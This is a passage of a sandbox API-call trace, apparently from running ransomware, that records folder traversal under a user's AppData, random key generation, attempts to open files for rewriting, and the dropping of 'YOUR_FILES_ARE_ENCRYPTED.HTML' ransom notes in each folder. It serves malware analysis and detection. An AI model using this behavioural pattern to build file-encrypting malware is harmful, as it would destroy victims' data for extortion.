ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x43a6a07, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7c4690c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x31, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="update.log", cAlternateFileName="")) returned 0 [0116.149] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.149] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0116.149] GetProcessHeap () returned 0x600000 [0116.149] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.150] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.151] CloseHandle (hObject=0x214) returned 1 [0116.151] GetProcessHeap () returned 0x600000 [0116.151] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.151] GetProcessHeap () returned 0x600000 [0116.151] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.152] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfcb66363, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfcb66363, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xfcb66363, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0116.152] StrStrIW (lpFirst="Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.152] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe") returned 134 [0116.152] GetProcessHeap () returned 0x600000 [0116.152] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.153] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe" [0116.153] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\*" [0116.154] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfcb66363, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfcb66363, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xfcb66363, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.154] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfcb66363, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfcb66363, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xfcb66363, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="..", cAlternateFileName="")) returned 1 [0116.154] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfcb66363, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfcb66363, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xfcce395b, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0116.154] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.154] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\ActivationStore") returned 150 [0116.154] GetProcessHeap () returned 0x600000 [0116.154] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0116.156] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\ActivationStore" [0116.156] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\ActivationStore\\*" [0116.156] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfcb66363, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfcce395b, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xfcce395b, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0d88, dwReserved1=0x19df88, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.156] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfcb66363, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfcce395b, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xfcce395b, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0d88, dwReserved1=0x19df88, cFileName="..", cAlternateFileName="")) returned 1 [0116.156] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcb66363, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0x184a8c5e, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0xfd39837d, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x6f0d88, dwReserved1=0x19df88, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0116.156] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.156] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 170 [0116.156] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0116.156] lstrlenW (lpString=".dat") returned 4 [0116.156] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0116.156] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0116.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0116.157] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xfcce395b, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfcce395b, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xfcce395b, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0d88, dwReserved1=0x19df88, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0116.157] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.157] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 175 [0116.157] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0116.157] lstrlenW (lpString=".LOG1") returned 5 [0116.157] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0116.157] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xfcce395b, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfcce395b, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xfcce395b, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0d88, dwReserved1=0x19df88, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0116.157] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.157] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 175 [0116.157] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0116.157] lstrlenW (lpString=".LOG2") returned 5 [0116.157] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0116.157] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xfcce395b, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfcce395b, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xfcce395b, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0d88, dwReserved1=0x19df88, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0116.157] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.157] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 180 [0116.158] GetProcessHeap () returned 0x600000 [0116.158] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0116.159] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.160] CloseHandle (hObject=0x31c) returned 1 [0116.160] GetProcessHeap () returned 0x600000 [0116.160] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.160] GetProcessHeap () returned 0x600000 [0116.160] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0116.160] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfcb66363, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfcb66363, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xfcce395b, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0116.160] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.160] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 164 [0116.160] GetProcessHeap () returned 0x600000 [0116.160] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.161] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.161] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.162] CloseHandle (hObject=0x214) returned 1 [0116.163] GetProcessHeap () returned 0x600000 [0116.163] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.163] GetProcessHeap () returned 0x600000 [0116.163] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.166] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41bbad4, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf41bbad4, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf41bbad4, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0116.166] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.166] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\RoamingState") returned 95 [0116.166] GetProcessHeap () returned 0x600000 [0116.166] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.167] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\RoamingState" [0116.167] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\RoamingState\\*" [0116.167] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41bbad4, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf41bbad4, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf41bbad4, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.168] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41bbad4, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf41bbad4, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf41bbad4, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="..", cAlternateFileName="")) returned 1 [0116.168] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41bbad4, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf41bbad4, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf41bbad4, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="..", cAlternateFileName="")) returned 0 [0116.168] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.168] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0116.168] GetProcessHeap () returned 0x600000 [0116.168] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.168] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.169] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.170] CloseHandle (hObject=0x214) returned 1 [0116.170] GetProcessHeap () returned 0x600000 [0116.170] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.171] GetProcessHeap () returned 0x600000 [0116.171] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.171] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4213a66, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf426a58a, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0x26a02595, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0116.171] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.171] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Settings") returned 91 [0116.171] GetProcessHeap () returned 0x600000 [0116.171] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.171] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Settings" [0116.171] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Settings\\*" [0116.171] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, 